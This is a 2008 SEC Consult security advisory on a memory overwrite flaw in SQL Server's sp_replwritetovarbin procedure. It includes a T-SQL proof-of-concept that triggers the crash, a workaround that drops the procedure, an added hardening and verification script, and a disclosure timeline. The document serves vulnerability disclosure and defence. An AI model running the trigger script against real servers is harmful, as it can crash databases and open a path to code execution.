Microsoft SQL Server sp_replwritetovarbin

SEC Consult Security Advisory < 20081209-0 >
=====================================================================================
              title: Microsoft SQL Server sp_replwritetovarbin
                     limited memory overwrite vulnerability
            program: Microsoft SQL Server 2000
                     Microsoft SQL Server 2005
 vulnerable version: SQL Server 2000 (current version, tested on 8.00.2039)
                     SQL Server 2005 (current version, tested on 9.00.1399.06)
              found: 04-12-2008
                 by: Bernhard Mueller (SEC Consult Vulnerability Lab)
         perm. link: www.sec-consult.com/files/20081209_mssql-sp_replwritetovarbin_memwrite.txt
=====================================================================================


Product description:
--------------------

Microsoft SQL Server is a relational database management system (RDBMS) produced by Microsoft. Its primary query language is Transact-SQL, an implementation of the ANSI/ISO standard Structured Query Language (SQL) used by both Microsoft and Sybase.


Vulnerability overview:
-----------------------

By calling the extended stored procedure sp_replwritetovarbin and supplying several uninitialized variables as parameters, it is possible to trigger a memory write to a controlled location. Depending on the underlying Windows version, it is possible, or may be possible, to use this vulnerability to execute arbitrary code in the context of the vulnerable SQL Server process.

In a default configuration, the sp_replwritetovarbin stored procedure is accessible by anyone. The vulnerability can be exploited by an authenticated user with a direct database connection, or via SQL injection in a vulnerable web application.

This vulnerability has been confirmed on SQL Server 2000/2005 (SQL Server 2008 has not been tested).


Vulnerability details:
----------------------

The following T-SQL script can be used to test for the vulnerability:


--------------------------------
DECLARE @buf NVARCHAR(4000), 
@val NVARCHAR(4), 
@counter INT

SET @buf = '
declare @retcode int, 
@end_offset int, 
@vb_buffer varbinary,
@vb_bufferlen int, 
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1, 
  @end_offset output, 
  @vb_buffer output,
  @vb_bufferlen output,'''

SET @val = CHAR(0x41)

SET @counter = 0
WHILE @counter < 3000
BEGIN
  SET @counter = @counter + 1
  SET @buf = @buf + @val
END

SET @buf = @buf + ''',''1'',''1'',''1'',
''1'',''1'',''1'',''1'',''1'',''1'''

EXEC master..sp_executesql @buf
--------------------------------


This triggers an access violation exception (write to address 0x41414141).

The vulnerability has been successfully used to execute arbitrary code on a lab machine.

SEC Consult will not release code execution exploits for this vulnerability to the public.



Workaround:
-----------

Remove the sp_replwritetovarbin extended stored procedure. Run the following as an administrator:

execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'

See also:

"Removing an Extended Stored Procedure from SQL Server"
msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx
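
The following T-SQL is an added example for applying and verifying the workaround; it is not part of the SEC Consult advisory. It assumes a sysadmin connection to a SQL Server 2000 or 2005 instance and uses the master.dbo.sysobjects catalog (still available as a compatibility view on 2005), where extended stored procedures appear with xtype 'X'. The procedure's name suggests it is used by replication, so the assumption here is that the instance does not depend on it; test on a non-production instance first if the server participates in replication.

```sql
-- Added example (not from the SEC Consult advisory): check whether the
-- sp_replwritetovarbin extended stored procedure is still registered in
-- master, remove it if so, and verify the removal. Run as sysadmin.
USE master;
GO

-- Extended stored procedures are catalogued in sysobjects with xtype = 'X'.
IF EXISTS (SELECT 1
           FROM master.dbo.sysobjects
           WHERE name = 'sp_replwritetovarbin' AND xtype = 'X')
BEGIN
    PRINT 'sp_replwritetovarbin is registered; dropping it.';
    -- Same command the advisory gives as the workaround.
    EXEC dbo.sp_dropextendedproc 'sp_replwritetovarbin';
END
ELSE
BEGIN
    PRINT 'sp_replwritetovarbin is not registered; nothing to do.';
END
GO

-- Verification: after a successful drop this query returns no rows.
-- Re-run it after service packs or re-installs, since setup may
-- re-register the procedure.
SELECT name, xtype
FROM master.dbo.sysobjects
WHERE name = 'sp_replwritetovarbin';
GO
```

The existence check keeps the script idempotent, so it can be scheduled or included in a hardening baseline without erroring on instances where the procedure has already been removed.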



Patch:
------

According to an email received from Microsoft in September, a fix for this vulnerability has been completed.

The release schedule for this fix is currently unknown.



Vendor timeline:
----------------

Vendor notified:                                          2008-04-17
Vendor response:                                          2008-04-17
Last response from Microsoft:                             09-29-2008
Request for update status 1:                              10-14-2008
Request for update status 2:                              10-29-2008
Request for update status 3:                              11-12-2008
Request for update status 4
and prenotification about advisory release date:          11-28-2008
Public release:                                           12-09-2008
Update (added SQL Server 2005, thanks Moreno Zilli):      12-10-2008


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2008